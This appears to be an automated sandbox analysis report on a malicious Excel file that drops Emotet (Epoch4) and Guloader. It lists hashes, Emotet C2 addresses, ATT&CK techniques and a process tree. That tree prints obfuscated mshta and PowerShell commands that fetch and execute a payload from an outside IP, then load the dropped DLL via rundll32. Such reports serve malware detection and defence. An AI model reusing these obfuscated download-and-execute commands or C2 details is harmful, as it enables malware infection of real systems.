Overview

overview

10

Static

static

8

Contact.xls

windows7_x64

10

Contact.xls

windows10-2004_x64

10

Analysis

  • max time kernel
    124s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    21-01-2022 03:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Contact.xls

  • Size

    70KB

  • MD5

    e04cb27b9dc90bc46db1427db6c0a1e9

  • SHA1

    f87d71f6ac3588b9c5da2587801c320633783b04

  • SHA256

    d5b77f3b4a645ee3c6a166172d9b1d5c48f0228ba8cee64332af3cddab84e4a0

  • SHA512

    c01e9f94b6a319b6f208edbffb16790613a3f207b8a2113534a1c910241b71373e787b3ee394333babf7b014604f3140d5a16385dcdef007f91324584065f09f

Score
10/10
emotetguloaderepoch4bankerdownloaderguloaderpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080
eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Guloader Payload 1 IoCs
    guloader
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Contact.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3812
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3536
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3840
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2924
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkbak\ipfh.nxy",zUpM
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3684
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkbak\ipfh.nxy",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2260
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2268 -s 1704
          4⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1080
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    1⤵
      PID:724
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe 733ffa9d30a0a3a8f077b96337298a3b u3pCchQsYkujnCz7FYwSeA.0.1.0.0.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:3348
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 436 -p 2268 -ip 2268
      1⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Suspicious use of WriteProcessMemory
      PID:3668

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      f1eb9fcef8fdfa315b3b1697acbf3130

      SHA1

      32ea2aedbdbd45db0899eff996b550c4518f9aad

      SHA256

      61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

      SHA512

      cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

      Download Submit
    • C:\Users\Public\Documents\ssd.dll
      MD5

      f1eb9fcef8fdfa315b3b1697acbf3130

      SHA1

      32ea2aedbdbd45db0899eff996b550c4518f9aad

      SHA256

      61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

      SHA512

      cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

      Download Submit
    • C:\Users\Public\Documents\ssd.dll
      MD5

      f1eb9fcef8fdfa315b3b1697acbf3130

      SHA1

      32ea2aedbdbd45db0899eff996b550c4518f9aad

      SHA256

      61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

      SHA512

      cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

      Download Submit
    • C:\Windows\SysWOW64\Mkbak\ipfh.nxy
      MD5

      f1eb9fcef8fdfa315b3b1697acbf3130

      SHA1

      32ea2aedbdbd45db0899eff996b550c4518f9aad

      SHA256

      61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

      SHA512

      cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

      Download Submit
    • C:\Windows\SysWOW64\Mkbak\ipfh.nxy
      MD5

      f1eb9fcef8fdfa315b3b1697acbf3130

      SHA1

      32ea2aedbdbd45db0899eff996b550c4518f9aad

      SHA256

      61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

      SHA512

      cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

      Download Submit
    • memory/2260-383-0x0000000005370000-0x0000000005396000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-378-0x00000000051A0000-0x00000000051C6000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-416-0x0000000005860000-0x0000000005886000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-414-0x00000000057D0000-0x00000000057F6000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-380-0x0000000005200000-0x0000000005226000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-393-0x00000000053D0000-0x00000000053F6000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-395-0x0000000005500000-0x0000000005526000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-407-0x00000000056F0000-0x0000000005716000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-374-0x0000000004940000-0x0000000004966000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2260-376-0x00000000050C0000-0x00000000050E6000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2448-138-0x00007FFB374C0000-0x00007FFB374D0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-410-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-412-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-132-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-411-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-413-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-137-0x00007FFB374C0000-0x00007FFB374D0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-134-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-133-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-130-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2448-131-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2924-364-0x0000000004930000-0x0000000004956000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2924-369-0x0000000004B10000-0x0000000004B36000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2924-366-0x0000000004990000-0x00000000049B6000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2924-362-0x0000000004820000-0x0000000004846000-memory.dmp
      Filesize

      152KB

      Download
    • memory/2924-360-0x0000000004740000-0x0000000004766000-memory.dmp
      Filesize

      152KB

      Download
    • memory/3684-371-0x0000000004A00000-0x0000000004A26000-memory.dmp
      Filesize

      152KB

      Download
    • memory/3812-359-0x000001D0775C0000-0x000001D077636000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3812-248-0x000001D0771A0000-0x000001D0771E4000-memory.dmp
      Filesize

      272KB

      Download
    • memory/3812-246-0x000001D05EDD0000-0x000001D076FC0000-memory.dmp
      Filesize

      385.9MB

      Download
    • memory/3812-245-0x000001D05EDD0000-0x000001D076FC0000-memory.dmp
      Filesize

      385.9MB

      Download
    • memory/3812-243-0x000001D05EDD0000-0x000001D076FC0000-memory.dmp
      Filesize

      385.9MB

      Download
    • memory/3812-242-0x000001D077120000-0x000001D077142000-memory.dmp
      Filesize

      136KB

      Download